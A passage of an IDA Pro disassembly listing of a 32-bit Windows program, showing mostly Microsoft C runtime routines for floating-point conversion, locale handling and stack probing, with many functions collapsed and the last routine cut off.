; [00000050 BYTES: COLLAPSED FUNCTION _has_osfxsr_set. PRESS KEYPAD "+" TO EXPAND]
; [00000060 BYTES: COLLAPSED FUNCTION unknown_libname_133. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40F839 proc near ; DATA XREF: .rdata:0041D2D0�o
call unknown_libname_133 ; Microsoft VisualC 2-8/net runtime
mov dword_433C7C, eax
xor eax, eax
retn
sub_40F839 endp
; [000002DA BYTES: COLLAPSED FUNCTION __raise_exc_ex. PRESS KEYPAD "+" TO EXPAND]
; [000001E1 BYTES: COLLAPSED FUNCTION __handle_exc. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION unknown_libname_135. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __errcode. PRESS KEYPAD "+" TO EXPAND]
; [0000009E BYTES: COLLAPSED FUNCTION __umatherr. PRESS KEYPAD "+" TO EXPAND]
; [00000053 BYTES: COLLAPSED FUNCTION __handle_qnan1. PRESS KEYPAD "+" TO EXPAND]
; [000000BA BYTES: COLLAPSED FUNCTION __except1. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __frnd. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION __set_exp. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION __sptype. PRESS KEYPAD "+" TO EXPAND]
; [000000AF BYTES: COLLAPSED FUNCTION __decomp. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION __statfp. PRESS KEYPAD "+" TO EXPAND]
; [0000000C BYTES: COLLAPSED FUNCTION __clrfp. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ctrlfp. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION __set_statfp. PRESS KEYPAD "+" TO EXPAND]
; [00000072 BYTES: COLLAPSED FUNCTION ___set_fpsr_sse2. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION x_ismbbtype_l(localeinfo_struct *,uint,int,int). PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_136. PRESS KEYPAD "+" TO EXPAND]
; [000000F2 BYTES: COLLAPSED FUNCTION _abort. PRESS KEYPAD "+" TO EXPAND]
$LN6_1 db 0CCh
; [00000047 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001B2 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000016 BYTES: COLLAPSED FUNCTION __alloca_probe_16. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__alloca_probe_8:
push ecx
lea ecx, [esp+8]
sub ecx, eax
and ecx, 7
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp __alloca_probe
; [000000C2 BYTES: COLLAPSED FUNCTION __putwch_nolock. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 2
call __amsg_exit
pop ecx
retn
; [000001B4 BYTES: COLLAPSED FUNCTION __chsize_nolock. PRESS KEYPAD "+" TO EXPAND]
; [00000072 BYTES: COLLAPSED FUNCTION __lseek_nolock. PRESS KEYPAD "+" TO EXPAND]
; [000000BC BYTES: COLLAPSED FUNCTION __setmode_nolock. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_410889 proc near ; CODE XREF: __tsopen_nolock+40�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_4108B1
call __errno
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call __invalid_parameter
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4108B1: ; CODE XREF: sub_410889+9�j
mov ecx, dword_426560
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_410889 endp
; [00000071 BYTES: COLLAPSED FUNCTION __forcdecpt_l. PRESS KEYPAD "+" TO EXPAND]
; [00000080 BYTES: COLLAPSED FUNCTION __cropzeros_l. PRESS KEYPAD "+" TO EXPAND]
__positive dw 0EED9h ; DATA XREF: __cfltcvt_init+28�o
; .data:off_423F90�o
dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h
; [00000040 BYTES: COLLAPSED FUNCTION __fassign_l. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __fassign. PRESS KEYPAD "+" TO EXPAND]
; [0000001D BYTES: COLLAPSED FUNCTION __shift. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION __forcdecpt. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION __cropzeros. PRESS KEYPAD "+" TO EXPAND]
; [0000016D BYTES: COLLAPSED FUNCTION __cftoe2_l. PRESS KEYPAD "+" TO EXPAND]
; [000000CE BYTES: COLLAPSED FUNCTION __cftoe_l. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION __cftoe. PRESS KEYPAD "+" TO EXPAND]
; [00000371 BYTES: COLLAPSED FUNCTION __cftoa_l. PRESS KEYPAD "+" TO EXPAND]
; [000000F5 BYTES: COLLAPSED FUNCTION __cftof2_l. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __cftof_l. PRESS KEYPAD "+" TO EXPAND]
; [000000F8 BYTES: COLLAPSED FUNCTION __cftog_l. PRESS KEYPAD "+" TO EXPAND]
; [00000086 BYTES: COLLAPSED FUNCTION __cfltcvt_l. PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION __cfltcvt. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __setdefaultprecision. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __ms_p5_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION __ms_p5_mp_test_fdiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002B BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [0000001F BYTES: COLLAPSED FUNCTION ___initconout. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION ___termcon. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002D BYTES: COLLAPSED FUNCTION _strrchr. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4114AD proc near ; CODE XREF: __fassign_l+15�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call ??0_LocaleUpdate@@QAE@PAUlocaleinfo_struct@@@Z ; _LocaleUpdate::_LocaleUpdate(localeinfo_struct *)
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call ___strgtold12_l
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411969
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_41152A
cmp eax, 1
jnz short loc_411515
loc_411504: ; CODE XREF: sub_4114AD+87�j
cmp [ebp+var_18], bl
jz short loc_411510
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411510: ; CODE XREF: sub_4114AD+5A�j
push 3
loc_411512: ; CODE XREF: sub_4114AD+7B�j
pop eax
jmp short loc_411544
; ---------------------------------------------------------------------------
loc_411515: ; CODE XREF: sub_4114AD+55�j
cmp eax, 2
jnz short loc_411536
loc_41151A: ; CODE XREF: sub_4114AD+81�j
cmp [ebp+var_18], bl
jz short loc_411526
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411526: ; CODE XREF: sub_4114AD+70�j
push 4
jmp short loc_411512
; ---------------------------------------------------------------------------
loc_41152A: ; CODE XREF: sub_4114AD+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_41151A
test byte ptr [ebp+var_14], 2
jnz short loc_411504
loc_411536: ; CODE XREF: sub_4114AD+6B�j
cmp [ebp+var_18], bl
jz short loc_411542
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_411542: ; CODE XREF: sub_4114AD+8C�j
xor eax, eax
loc_411544: ; CODE XREF: sub_4114AD+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4114AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411553 proc near ; CODE XREF: __fassign_l+2E�p
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_8]
mov edi, [ebp+arg_4]
lea ecx, [ebp+var_24]
call ??0_LocaleUpdate@@QAE@PAUlocaleinfo_struct@@@Z ; _LocaleUpdate::_LocaleUpdate(localeinfo_struct *)
lea eax, [ebp+var_24]
push eax
xor ebx, ebx
push ebx
push ebx
push ebx
push ebx
push edi
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_10]
push eax
call ___strgtold12_l
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push esi
push eax
call sub_411EAB
add esp, 28h
test byte ptr [ebp+var_14], 3
jnz short loc_4115D0
cmp eax, 1
jnz short loc_4115BB
loc_4115AA: ; CODE XREF: sub_411553+87�j
cmp [ebp+var_18], bl
jz short loc_4115B6
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115B6: ; CODE XREF: sub_411553+5A�j
push 3
loc_4115B8: ; CODE XREF: sub_411553+7B�j
pop eax
jmp short loc_4115EA
; ---------------------------------------------------------------------------
loc_4115BB: ; CODE XREF: sub_411553+55�j
cmp eax, 2
jnz short loc_4115DC
loc_4115C0: ; CODE XREF: sub_411553+81�j
cmp [ebp+var_18], bl
jz short loc_4115CC
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115CC: ; CODE XREF: sub_411553+70�j
push 4
jmp short loc_4115B8
; ---------------------------------------------------------------------------
loc_4115D0: ; CODE XREF: sub_411553+50�j
test byte ptr [ebp+var_14], 1
jnz short loc_4115C0
test byte ptr [ebp+var_14], 2
jnz short loc_4115AA
loc_4115DC: ; CODE XREF: sub_411553+6B�j
cmp [ebp+var_18], bl
jz short loc_4115E8
mov eax, [ebp+var_1C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4115E8: ; CODE XREF: sub_411553+8C�j
xor eax, eax
loc_4115EA: ; CODE XREF: sub_411553+66�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_411553 endp
; [000000BD BYTES: COLLAPSED FUNCTION __fptostr. PRESS KEYPAD "+" TO EXPAND]
; [000000BB BYTES: COLLAPSED FUNCTION ___dtold. PRESS KEYPAD "+" TO EXPAND]
; [0000008E BYTES: COLLAPSED FUNCTION __fltout2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000DF BYTES: COLLAPSED FUNCTION __alldvrm. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION unknown_libname_137. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION __controlfp_s. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411969 proc near ; CODE XREF: sub_4114AD+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_4119D3
xor ebx, ebx
xor eax, eax
loc_4119B0: ; CODE XREF: sub_411969+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_4119C3
inc eax
cmp eax, 3
jl short loc_4119B0
xor eax, eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119C3: ; CODE XREF: sub_411969+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_411E68
; ---------------------------------------------------------------------------
loc_4119D3: ; CODE XREF: sub_411969+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411A0B
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411A0B: ; CODE XREF: sub_411969+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
xor eax, eax
pop ecx
sub ecx, edx
inc eax
shl eax, cl
mov [ebp+var_8], ecx
test [edi], eax
jz loc_411AB1
mov eax, [ebp+var_C]
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411A39
; ---------------------------------------------------------------------------
loc_411A34: ; CODE XREF: sub_411969+D6�j
cmp [ebp+eax*4+var_20], 0
loc_411A39: ; CODE XREF: sub_411969+C9�j
jnz short loc_411A43
inc eax
cmp eax, 3
jl short loc_411A34
jmp short loc_411AB1
; ---------------------------------------------------------------------------
loc_411A43: ; CODE XREF: sub_411969:loc_411A39�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411A5D
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411A5D: ; CODE XREF: sub_411969+ED�j
and [ebp+var_4], 0
sub ecx, esi
xor edx, edx
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
add esi, edx
mov [ebp+arg_0], esi
mov esi, [ecx]
cmp [ebp+arg_0], esi
jb short loc_411A9C
cmp [ebp+arg_0], edx
jmp short loc_411A9A
; ---------------------------------------------------------------------------
loc_411A7F: ; CODE XREF: sub_411969+143�j
test ecx, ecx
jz short loc_411AAE
and [ebp+var_4], 0
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
cmp esi, edx
mov [ebp+arg_0], esi
jb short loc_411A9C
cmp esi, 1
loc_411A9A: ; CODE XREF: sub_411969+114�j
jnb short loc_411AA3
loc_411A9C: ; CODE XREF: sub_411969+10F�j
; sub_411969+12C�j
mov [ebp+var_4], 1
loc_411AA3: ; CODE XREF: sub_411969:loc_411A9A�j
dec eax
mov edx, [ebp+arg_0]
mov [ecx], edx
mov ecx, [ebp+var_4]
jns short loc_411A7F
loc_411AAE: ; CODE XREF: sub_411969+118�j
mov [ebp+arg_0], ecx
loc_411AB1: ; CODE XREF: sub_411969+B5�j
; sub_411969+D8�j
mov ecx, [ebp+var_8]
or eax, 0FFFFFFFFh
shl eax, cl
and [edi], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411AD1
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411AD1: ; CODE XREF: sub_411969+159�j
cmp [ebp+arg_0], 0
jz short loc_411AD8
inc ebx
loc_411AD8: ; CODE XREF: sub_411969+16C�j
mov eax, dword_424234
mov ecx, eax
sub ecx, dword_424238
cmp ebx, ecx
jge short loc_411AF6
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
jmp loc_411D03
; ---------------------------------------------------------------------------
loc_411AF6: ; CODE XREF: sub_411969+17E�j
cmp ebx, eax
jg loc_411D0D
sub eax, [ebp+var_10]
lea esi, [ebp+var_2C]
mov ecx, eax
lea edi, [ebp+var_20]
movsd
cdq
and edx, 1Fh
add eax, edx
movsd
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
movsd
jns short loc_411B24
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411B24: ; CODE XREF: sub_411969+1B4�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411B3F: ; CODE XREF: sub_411969+201�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411B3F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411B79: ; CODE XREF: sub_411969+227�j
cmp edx, eax
jl short loc_411B85
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411B8A
; ---------------------------------------------------------------------------
loc_411B85: ; CODE XREF: sub_411969+212�j
and [ebp+edx*4+var_20], 0
loc_411B8A: ; CODE XREF: sub_411969+21A�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411B79
mov esi, dword_424238
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_C], eax
jns short loc_411BB9
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411BB9: ; CODE XREF: sub_411969+249�j
push 1Fh
pop ecx
sub ecx, edx
xor edx, edx
inc edx
shl edx, cl
lea ebx, [ebp+eax*4+var_20]
mov [ebp+var_10], ecx
test [ebx], edx
jz loc_411C54
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [ebp+eax*4+var_20], edx
jmp short loc_411BE4
; ---------------------------------------------------------------------------
loc_411BDF: ; CODE XREF: sub_411969+281�j
cmp [ebp+eax*4+var_20], 0
loc_411BE4: ; CODE XREF: sub_411969+274�j
jnz short loc_411BEE
inc eax
cmp eax, 3
jl short loc_411BDF
jmp short loc_411C54
; ---------------------------------------------------------------------------
loc_411BEE: ; CODE XREF: sub_411969:loc_411BE4�j
mov eax, esi
cdq
push 1Fh
pop ecx
and edx, ecx
add eax, edx
sar eax, 5
and esi, 8000001Fh
jns short loc_411C08
dec esi
or esi, 0FFFFFFE0h
inc esi
loc_411C08: ; CODE XREF: sub_411969+298�j
and [ebp+arg_0], 0
xor edx, edx
sub ecx, esi
inc edx
shl edx, cl
lea ecx, [ebp+eax*4+var_20]
mov esi, [ecx]
lea edi, [esi+edx]
cmp edi, esi
jb short loc_411C24
cmp edi, edx
jnb short loc_411C2B
loc_411C24: ; CODE XREF: sub_411969+2B5�j
mov [ebp+arg_0], 1
loc_411C2B: ; CODE XREF: sub_411969+2B9�j
mov [ecx], edi
mov ecx, [ebp+arg_0]
jmp short loc_411C51
; ---------------------------------------------------------------------------
loc_411C32: ; CODE XREF: sub_411969+2E9�j
test ecx, ecx
jz short loc_411C54
lea ecx, [ebp+eax*4+var_20]
mov edx, [ecx]
lea esi, [edx+1]
xor edi, edi
cmp esi, edx
jb short loc_411C4A
cmp esi, 1
jnb short loc_411C4D
loc_411C4A: ; CODE XREF: sub_411969+2DA�j
xor edi, edi
inc edi
loc_411C4D: ; CODE XREF: sub_411969+2DF�j
mov [ecx], esi
mov ecx, edi
loc_411C51: ; CODE XREF: sub_411969+2C7�j
dec eax
jns short loc_411C32
loc_411C54: ; CODE XREF: sub_411969+263�j
; sub_411969+283�j ...
mov ecx, [ebp+var_10]
or eax, 0FFFFFFFFh
shl eax, cl
and [ebx], eax
mov eax, [ebp+var_C]
inc eax
cmp eax, 3
jge short loc_411C74
push 3
pop ecx
lea edi, [ebp+eax*4+var_20]
sub ecx, eax
xor eax, eax
rep stosd
loc_411C74: ; CODE XREF: sub_411969+2FC�j
mov ecx, dword_42423C
inc ecx
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411C95
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411C95: ; CODE XREF: sub_411969+325�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411CB0: ; CODE XREF: sub_411969+372�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411CB0
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411CEA: ; CODE XREF: sub_411969+398�j
cmp edx, eax
jl short loc_411CF6
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411CFB
; ---------------------------------------------------------------------------
loc_411CF6: ; CODE XREF: sub_411969+383�j
and [ebp+edx*4+var_20], 0
loc_411CFB: ; CODE XREF: sub_411969+38B�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411CEA
loc_411D03: ; CODE XREF: sub_411969+188�j
push 2
xor ebx, ebx
pop eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411D0D: ; CODE XREF: sub_411969+18F�j
cmp ebx, dword_424230
mov ecx, dword_42423C
jl loc_411DCC
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
stosd
or [ebp+var_20], 80000000h
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411D48
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411D48: ; CODE XREF: sub_411969+3D8�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or edi, 0FFFFFFFFh
mov ecx, edx
shl edi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not edi
loc_411D63: ; CODE XREF: sub_411969+425�j
mov ebx, [ebp+arg_0]
lea ebx, [ebp+ebx*4+var_20]
mov esi, [ebx]
mov ecx, esi
and ecx, edi
mov [ebp+var_10], ecx
mov ecx, edx
shr esi, cl
mov ecx, [ebp+var_4]
or esi, [ebp+var_C]
mov [ebx], esi
mov esi, [ebp+var_10]
shl esi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], esi
jl short loc_411D63
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411D9D: ; CODE XREF: sub_411969+44B�j
cmp edx, eax
jl short loc_411DA9
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411DAE
; ---------------------------------------------------------------------------
loc_411DA9: ; CODE XREF: sub_411969+436�j
and [ebp+edx*4+var_20], 0
loc_411DAE: ; CODE XREF: sub_411969+43E�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411D9D
mov eax, dword_424230
mov ecx, dword_424244
lea ebx, [ecx+eax]
xor eax, eax
inc eax
jmp loc_411E67
; ---------------------------------------------------------------------------
loc_411DCC: ; CODE XREF: sub_411969+3B0�j
mov eax, dword_424244
and [ebp+var_20], 7FFFFFFFh
add ebx, eax
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
mov edx, ecx
sar eax, 5
and edx, 8000001Fh
jns short loc_411DF4
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411DF4: ; CODE XREF: sub_411969+484�j
and [ebp+var_C], 0
and [ebp+arg_0], 0
or esi, 0FFFFFFFFh
mov ecx, edx
shl esi, cl
mov [ebp+var_4], 20h
sub [ebp+var_4], edx
not esi
loc_411E0F: ; CODE XREF: sub_411969+4D4�j
mov ecx, [ebp+arg_0]
mov edi, [ebp+ecx*4+var_20]
mov ecx, edi
and ecx, esi
mov [ebp+var_10], ecx
mov ecx, edx
shr edi, cl
mov ecx, [ebp+arg_0]
or edi, [ebp+var_C]
mov [ebp+ecx*4+var_20], edi
mov edi, [ebp+var_10]
mov ecx, [ebp+var_4]
shl edi, cl
inc [ebp+arg_0]
cmp [ebp+arg_0], 3
mov [ebp+var_C], edi
jl short loc_411E0F
mov esi, eax
push 2
shl esi, 2
lea ecx, [ebp+var_18]
pop edx
sub ecx, esi
loc_411E4C: ; CODE XREF: sub_411969+4FA�j
cmp edx, eax
jl short loc_411E58
mov esi, [ecx]
mov [ebp+edx*4+var_20], esi
jmp short loc_411E5D
; ---------------------------------------------------------------------------
loc_411E58: ; CODE XREF: sub_411969+4E5�j
and [ebp+edx*4+var_20], 0
loc_411E5D: ; CODE XREF: sub_411969+4ED�j
dec edx
sub ecx, 4
test edx, edx
jge short loc_411E4C
xor eax, eax
loc_411E67: ; CODE XREF: sub_411969+39F�j
; sub_411969+45E�j
pop esi
loc_411E68: ; CODE XREF: sub_411969+55�j
; sub_411969+65�j
push 1Fh
pop ecx
sub ecx, dword_42423C
shl ebx, cl
mov ecx, [ebp+var_14]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or ebx, ecx
mov ecx, dword_424240
or ebx, [ebp+var_20]
cmp ecx, 40h
jnz short loc_411E9D
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], ebx
mov [ecx], edx
jmp short loc_411EA7
; ---------------------------------------------------------------------------
loc_411E9D: ; CODE XREF: sub_411969+525�j
cmp ecx, 20h
jnz short loc_411EA7
mov ecx, [ebp+arg_4]
mov [ecx], ebx
loc_411EA7: ; CODE XREF: sub_411969+532�j
; sub_411969+537�j
pop edi
pop ebx
leave
retn
sub_411969 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411EAB proc near ; CODE XREF: sub_411553+44�p
var_2C = byte ptr -2Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, [ebp+arg_0]
movzx ecx, word ptr [eax+0Ah]
push ebx
mov ebx, ecx
and ecx, 8000h
mov [ebp+var_14], ecx
mov ecx, [eax+6]
mov [ebp+var_20], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
and ebx, 7FFFh
sub ebx, 3FFFh
shl eax, 10h
cmp ebx, 0FFFFC001h
push edi
mov [ebp+var_1C], ecx
mov [ebp+var_18], eax
jnz short loc_411F15
xor ebx, ebx
xor eax, eax
loc_411EF2: ; CODE XREF: sub_411EAB+51�j
cmp [ebp+eax*4+var_20], ebx
jnz short loc_411F05
inc eax
cmp eax, 3
jl short loc_411EF2
xor eax, eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F05: ; CODE XREF: sub_411EAB+4B�j
xor eax, eax
lea edi, [ebp+var_20]
stosd
stosd
push 2
stosd
pop eax
jmp loc_4123AA
; ---------------------------------------------------------------------------
loc_411F15: ; CODE XREF: sub_411EAB+41�j
and [ebp+arg_0], 0
push esi
lea esi, [ebp+var_20]
lea edi, [ebp+var_2C]
movsd
movsd
movsd
mov esi, dword_424250
dec esi
lea ecx, [esi+1]
mov eax, ecx
cdq
and edx, 1Fh
add eax, edx
sar eax, 5
mov edx, ecx
and edx, 8000001Fh
mov [ebp+var_10], ebx
mov [ebp+var_C], eax
jns short loc_411F4D
dec edx
or edx, 0FFFFFFE0h
inc edx
loc_411F4D: ; CODE XREF: sub_411EAB+9B�j
lea edi, [ebp+eax*4+var_20]
push 1Fh
